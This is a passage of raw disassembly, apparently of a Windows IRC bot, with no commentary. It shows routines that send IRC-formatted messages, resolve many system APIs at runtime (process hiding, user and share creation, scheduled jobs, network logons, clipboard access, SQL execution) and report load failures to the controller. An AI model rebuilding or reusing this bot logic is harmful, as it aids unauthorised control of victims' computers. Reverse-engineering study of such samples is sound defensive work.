mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40571B
sub eax, edx
mov esi, eax
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
loc_40572C: ; CODE XREF: sub_4056FB+36�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40572C
push [ebp+arg_8]
sub eax, ecx
mov ecx, 1FAh
sub ecx, eax
push offset aS_2 ; "%s"
sub ecx, esi
push ecx
lea eax, [ebp+var_400]
push eax
call sub_41483D
lea eax, [ebp+var_400]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_200]
push edi
push offset aSSS ; "%s %s :%s\r\n"
push eax
call sub_4145E5
add esp, 24h
lea eax, [ebp+var_200]
pop edi
lea ecx, [eax+1]
pop esi
loc_40577D: ; CODE XREF: sub_4056FB+87�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40577D
push 0
sub eax, ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_43587C ; send
cmp [ebp+arg_10], 0
jz short locret_4057AA
push 0FAh
call ds:dword_420000 ; Sleep
locret_4057AA: ; CODE XREF: sub_4056FB+A2�j
leave
retn
sub_4056FB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4057AC proc near ; CODE XREF: sub_40E745+4B�p
push ebx
push ebp
mov ebp, ds:dword_4200A4
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, ds:dword_420084
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_4058CC
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_4357C0, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov dword_4357D8, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov dword_435834, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov dword_435798, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_435800, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_4357E4, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_435884, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_435774, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_435808, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_43582C, eax
call esi ; GetProcAddress
cmp dword_4357C0, ebx
mov dword_435890, eax
jz short loc_4058AA
cmp dword_4357D8, ebx
jz short loc_4058AA
cmp dword_435834, ebx
jz short loc_4058AA
cmp dword_435798, ebx
jz short loc_4058AA
cmp dword_4357E4, ebx
jz short loc_4058AA
cmp dword_435884, ebx
jz short loc_4058AA
cmp dword_435774, ebx
jz short loc_4058AA
cmp dword_435808, ebx
jz short loc_4058AA
cmp dword_43582C, ebx
jz short loc_4058AA
cmp eax, ebx
jnz short loc_4058B4
loc_4058AA: ; CODE XREF: sub_4057AC+B8�j
; sub_4057AC+C0�j ...
mov dword_435938, 1
loc_4058B4: ; CODE XREF: sub_4057AC+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_4358E4, eax
jz short loc_4058E1
push 1
push ebx
call eax
jmp short loc_4058E1
; ---------------------------------------------------------------------------
loc_4058CC: ; CODE XREF: sub_4057AC+1D�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_43593C, eax
mov dword_435938, 1
loc_4058E1: ; CODE XREF: sub_4057AC+117�j
; sub_4057AC+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:dword_420088 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40599C
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_4358A8, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
mov dword_435840, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_43577C, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_4357E0, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_435794, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_435914, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_435778, eax
call esi ; GetProcAddress
cmp dword_4358A8, ebx
mov dword_435880, eax
jz short loc_4059A7
cmp dword_435840, ebx
jz short loc_4059A7
cmp dword_43577C, ebx
jz short loc_4059A7
cmp dword_4357E0, ebx
jz short loc_4059A7
cmp dword_435794, ebx
jz short loc_4059A7
cmp dword_435914, ebx
jz short loc_4059A7
cmp dword_435778, ebx
jz short loc_4059A7
cmp eax, ebx
jnz short loc_4059B1
jmp short loc_4059A7
; ---------------------------------------------------------------------------
loc_40599C: ; CODE XREF: sub_4057AC+144�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_435944, eax
loc_4059A7: ; CODE XREF: sub_4057AC+1B8�j
; sub_4057AC+1C0�j ...
mov dword_435940, 1
loc_4059B1: ; CODE XREF: sub_4057AC+1EC�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_405B4C
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_435910, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_435830, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_4357CC, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_4357A8, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_435824, eax
call esi ; GetProcAddress
cmp dword_435910, ebx
mov dword_4358C4, eax
jz short loc_405A3C
cmp dword_435830, ebx
jz short loc_405A3C
cmp dword_4357CC, ebx
jz short loc_405A3C
cmp dword_4357A8, ebx
jz short loc_405A3C
cmp dword_435824, ebx
jz short loc_405A3C
cmp eax, ebx
jnz short loc_405A46
loc_405A3C: ; CODE XREF: sub_4057AC+26A�j
; sub_4057AC+272�j ...
mov dword_435948, 1
loc_405A46: ; CODE XREF: sub_4057AC+28E�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_43591C, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_435904, eax
call esi ; GetProcAddress
cmp dword_43591C, ebx
mov dword_435850, eax
jz short loc_405A81
cmp dword_435904, ebx
jz short loc_405A81
cmp eax, ebx
jnz short loc_405A8B
loc_405A81: ; CODE XREF: sub_4057AC+2C7�j
; sub_4057AC+2CF�j
mov dword_435948, 1
loc_405A8B: ; CODE XREF: sub_4057AC+2D3�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_4358A4, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_435920, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov dword_4358AC, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_4358C8, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_4357DC, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_435818, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_4358B4, eax
call esi ; GetProcAddress
cmp dword_4358A4, ebx
mov dword_4358E0, eax
jz short loc_405B2F
cmp dword_435920, ebx
jz short loc_405B2F
cmp dword_4358AC, ebx
jz short loc_405B2F
cmp dword_4358C8, ebx
jz short loc_405B2F
cmp dword_4357DC, ebx
jz short loc_405B2F
cmp dword_435818, ebx
jz short loc_405B2F
cmp dword_4358B4, ebx
jz short loc_405B2F
cmp eax, ebx
jnz short loc_405B39
loc_405B2F: ; CODE XREF: sub_4057AC+34D�j
; sub_4057AC+355�j ...
mov dword_435948, 1
loc_405B39: ; CODE XREF: sub_4057AC+381�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_435878, eax
jnz short loc_405B61
jmp short loc_405B57
; ---------------------------------------------------------------------------
loc_405B4C: ; CODE XREF: sub_4057AC+210�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_43594C, eax
loc_405B57: ; CODE XREF: sub_4057AC+39E�j
mov dword_435948, 1
loc_405B61: ; CODE XREF: sub_4057AC+39C�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_405C2D
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_435924, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_4358F8, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_435860, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_435858, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov dword_43589C, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov dword_435784, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_435870, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_435814, eax
call esi ; GetProcAddress
cmp dword_435924, ebx
mov dword_435864, eax
jz short loc_405C38
cmp dword_4358F8, ebx
jz short loc_405C38
cmp dword_435860, ebx
jz short loc_405C38
cmp dword_435858, ebx
jz short loc_405C38
cmp dword_43589C, ebx
jz short loc_405C38
cmp dword_435784, ebx
jz short loc_405C38
cmp dword_435870, ebx
jz short loc_405C38
cmp dword_435814, ebx
jz short loc_405C38
cmp eax, ebx
jnz short loc_405C42
jmp short loc_405C38
; ---------------------------------------------------------------------------
loc_405C2D: ; CODE XREF: sub_4057AC+3C0�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_435954, eax
loc_405C38: ; CODE XREF: sub_4057AC+441�j
; sub_4057AC+449�j ...
mov dword_435950, 1
loc_405C42: ; CODE XREF: sub_4057AC+47D�j
mov ebp, ds:dword_420088
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_405EFE
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_4357F8, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_43576C, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_435874, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_43583C, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_4358BC, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_4358A0, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov dword_435900, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_4357E8, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov dword_43578C, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_4357A0, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov dword_435868, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov dword_43585C, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov dword_435934, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov dword_43590C, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov dword_4358DC, eax
call esi ; GetProcAddress
push offset aSend ; "send"
push edi
mov dword_4358B8, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov dword_43587C, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov dword_4357B8, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_43575C, eax
call esi ; GetProcAddress
mov dword_435780, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov dword_4358C0, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov dword_43588C, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov dword_435908, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_4357AC, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov dword_435804, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov dword_435760, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_4358FC, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_435848, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov dword_4358D8, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov dword_435828, eax
call esi ; GetProcAddress
cmp dword_4357F8, ebx
mov dword_4358F4, eax
jz loc_405F09
cmp dword_43576C, ebx
jz loc_405F09
cmp dword_435874, ebx
jz loc_405F09
cmp dword_4358BC, ebx
jz loc_405F09
cmp dword_4358A0, ebx
jz loc_405F09
cmp dword_435900, ebx
jz loc_405F09
cmp dword_4357E8, ebx
jz loc_405F09
cmp dword_43578C, ebx
jz loc_405F09
cmp dword_4357A0, ebx
jz loc_405F09
cmp dword_435868, ebx
jz loc_405F09
cmp dword_43585C, ebx
jz loc_405F09
cmp dword_435934, ebx
jz loc_405F09
cmp dword_43590C, ebx
jz loc_405F09
cmp dword_4358DC, ebx
jz short loc_405F09
cmp dword_43587C, ebx
jz short loc_405F09
cmp dword_4357B8, ebx
jz short loc_405F09
cmp dword_43575C, ebx
jz short loc_405F09
cmp dword_435780, ebx
jz short loc_405F09
cmp dword_4358C0, ebx
jz short loc_405F09
cmp dword_43588C, ebx
jz short loc_405F09
cmp dword_435908, ebx
jz short loc_405F09
cmp dword_4357AC, ebx
jz short loc_405F09
cmp dword_435804, ebx
jz short loc_405F09
cmp dword_435760, ebx
jz short loc_405F09
cmp dword_4358FC, ebx
jz short loc_405F09
cmp dword_435848, ebx
jz short loc_405F09
cmp dword_4358D8, ebx
jz short loc_405F09
cmp eax, ebx
jnz short loc_405F13
jmp short loc_405F09
; ---------------------------------------------------------------------------
loc_405EFE: ; CODE XREF: sub_4057AC+4A7�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_43595C, eax
loc_405F09: ; CODE XREF: sub_4057AC+646�j
; sub_4057AC+652�j ...
mov dword_435958, 1
loc_405F13: ; CODE XREF: sub_4057AC+74E�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_406018
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_435770, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_435930, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_435810, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_43592C, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_43581C, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_435790, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_4357F0, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_435768, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_435894, eax
call esi ; GetProcAddress
cmp dword_435770, ebx
mov ecx, dword_435790
mov dword_435844, eax
jz short loc_405FF4
cmp dword_435930, ebx
jz short loc_405FF4
cmp dword_435810, ebx
jz short loc_405FF4
cmp dword_43592C, ebx
jz short loc_405FF4
cmp dword_43581C, ebx
jz short loc_405FF4
cmp ecx, ebx
jz short loc_405FF4
cmp dword_4357F0, ebx
jz short loc_405FF4
cmp dword_435768, ebx
jz short loc_405FF4
cmp dword_435894, ebx
jz short loc_405FF4
cmp eax, ebx
jnz short loc_405FFE
loc_405FF4: ; CODE XREF: sub_4057AC+806�j
; sub_4057AC+80E�j ...
mov dword_435960, 1
loc_405FFE: ; CODE XREF: sub_4057AC+846�j
cmp ecx, ebx
jz short loc_406033
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_435928, eax
jnz short loc_406033
jmp short loc_40602D
; ---------------------------------------------------------------------------
loc_406018: ; CODE XREF: sub_4057AC+772�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_435964, eax
mov dword_435960, 1
loc_40602D: ; CODE XREF: sub_4057AC+86A�j
mov dword_435928, ebx
loc_406033: ; CODE XREF: sub_4057AC+854�j
; sub_4057AC+868�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40607D
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_435838, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_43586C, eax
call esi ; GetProcAddress
cmp dword_435838, ebx
mov dword_4358D0, eax
jz short loc_406088
cmp dword_43586C, ebx
jz short loc_406088
cmp eax, ebx
jnz short loc_406092
jmp short loc_406088
; ---------------------------------------------------------------------------
loc_40607D: ; CODE XREF: sub_4057AC+892�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_43596C, eax
loc_406088: ; CODE XREF: sub_4057AC+8C1�j
; sub_4057AC+8C9�j ...
mov dword_435968, 1
loc_406092: ; CODE XREF: sub_4057AC+8CD�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_406188
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_4357D0, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_4357EC, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_4358E8, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_43579C, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_435820, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_435764, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_4357B4, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_4358B0, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_4357C8, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_4357D4, eax
call esi ; GetProcAddress
cmp dword_4357D0, ebx
mov dword_4357FC, eax
jz short loc_406193
cmp dword_4357EC, ebx
jz short loc_406193
cmp dword_4358E8, ebx
jz short loc_406193
cmp dword_43579C, ebx
jz short loc_406193
cmp dword_435820, ebx
jz short loc_406193
cmp dword_435764, ebx
jz short loc_406193
cmp dword_4357B4, ebx
jz short loc_406193
cmp dword_4358B0, ebx
jz short loc_406193
cmp dword_4357C8, ebx
jz short loc_406193
cmp dword_4357D4, ebx
jz short loc_406193
cmp eax, ebx
jnz short loc_40619D
jmp short loc_406193
; ---------------------------------------------------------------------------
loc_406188: ; CODE XREF: sub_4057AC+8F1�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_435974, eax
loc_406193: ; CODE XREF: sub_4057AC+98C�j
; sub_4057AC+994�j ...
mov dword_435970, 1
loc_40619D: ; CODE XREF: sub_4057AC+9D8�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4061D2
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_4358CC, eax
call esi ; GetProcAddress
cmp dword_4358CC, ebx
mov dword_43584C, eax
jz short loc_4061DD
cmp eax, ebx
jnz short loc_4061E7
jmp short loc_4061DD
; ---------------------------------------------------------------------------
loc_4061D2: ; CODE XREF: sub_4057AC+9FC�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_43597C, eax
loc_4061DD: ; CODE XREF: sub_4057AC+A1E�j
; sub_4057AC+A24�j
mov dword_435978, 1
loc_4061E7: ; CODE XREF: sub_4057AC+A22�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40621C
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_4357F4, eax
call esi ; GetProcAddress
cmp dword_4357F4, ebx
mov dword_435854, eax
jz short loc_406227
cmp eax, ebx
jnz short loc_406231
jmp short loc_406227
; ---------------------------------------------------------------------------
loc_40621C: ; CODE XREF: sub_4057AC+A46�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_435984, eax
loc_406227: ; CODE XREF: sub_4057AC+A68�j
; sub_4057AC+A6E�j
mov dword_435980, 1
loc_406231: ; CODE XREF: sub_4057AC+A6C�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406290
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_435888, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_435918, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_4357C4, eax
call esi ; GetProcAddress
cmp dword_435888, ebx
mov dword_435788, eax
jz short loc_40629B
cmp dword_435918, ebx
jz short loc_40629B
cmp dword_4357C4, ebx
jz short loc_40629B
cmp eax, ebx
jnz short loc_4062A5
jmp short loc_40629B
; ---------------------------------------------------------------------------
loc_406290: ; CODE XREF: sub_4057AC+A90�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_43598C, eax
loc_40629B: ; CODE XREF: sub_4057AC+ACC�j
; sub_4057AC+AD4�j ...
mov dword_435988, 1
loc_4062A5: ; CODE XREF: sub_4057AC+AE0�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4062DA
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_4358F0, eax
call esi ; GetProcAddress
cmp dword_4358F0, ebx
mov dword_4357BC, eax
jz short loc_4062E5
cmp eax, ebx
jnz short loc_4062EF
jmp short loc_4062E5
; ---------------------------------------------------------------------------
loc_4062DA: ; CODE XREF: sub_4057AC+B04�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_435994, eax
loc_4062E5: ; CODE XREF: sub_4057AC+B26�j
; sub_4057AC+B2C�j
mov dword_435990, 1
loc_4062EF: ; CODE XREF: sub_4057AC+B2A�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406378
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_4358D4, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_4357A4, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_4358EC, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_43580C, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_435898, eax
call esi ; GetProcAddress
cmp dword_4358D4, ebx
mov dword_4357B0, eax
jz short loc_406383
cmp dword_4357A4, ebx
jz short loc_406383
cmp dword_4358EC, ebx
jz short loc_406383
cmp dword_43580C, ebx
jz short loc_406383
cmp dword_435898, ebx
jz short loc_406383
cmp eax, ebx
jnz short loc_40638D
jmp short loc_406383
; ---------------------------------------------------------------------------
loc_406378: ; CODE XREF: sub_4057AC+B4E�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_43599C, eax
loc_406383: ; CODE XREF: sub_4057AC+BA4�j
; sub_4057AC+BAC�j ...
mov dword_435998, 1
loc_40638D: ; CODE XREF: sub_4057AC+BC8�j
pop edi
pop esi
xor eax, eax
pop ebp
inc eax
pop ebx
retn
sub_4057AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406395 proc near ; CODE XREF: sub_408A18+46B7�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp dword_435938, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_4063DD
push dword_43593C
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_4145E5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056FB
add esp, 20h
loc_4063DD: ; CODE XREF: sub_406395+1A�j
cmp dword_435940, esi
jz short loc_406411
push dword_435944
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_4145E5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056FB
add esp, 20h
loc_406411: ; CODE XREF: sub_406395+4E�j
cmp dword_435948, esi
jz short loc_406445
push dword_43594C
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_4145E5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056FB
add esp, 20h
loc_406445: ; CODE XREF: sub_406395+82�j
cmp dword_435950, esi
jz short loc_406479
push dword_435954
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_4145E5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056FB
add esp, 20h
loc_406479: ; CODE XREF: sub_406395+B6�j
cmp dword_435958, esi
jz short loc_4064AD
push dword_43595C
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_4145E5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056FB
add esp, 20h
loc_4064AD: ; CODE XREF: sub_406395+EA�j
cmp dword_435960, esi
jz short loc_4064E1
push dword_435964
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_4145E5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056FB
add esp, 20h
loc_4064E1: ; CODE XREF: sub_406395+11E�j
cmp dword_435968, esi
jz short loc_406515
push dword_43596C
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_4145E5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056FB
add esp, 20h
loc_406515: ; CODE XREF: sub_406395+152�j
cmp dword_435970, esi
jz short loc_406549
push dword_435974
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_4145E5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056FB
add esp, 20h
loc_406549: ; CODE XREF: sub_406395+186�j
cmp dword_435978, esi
jz short loc_40657D
push dword_43597C
lea eax, [ebp+var_200]
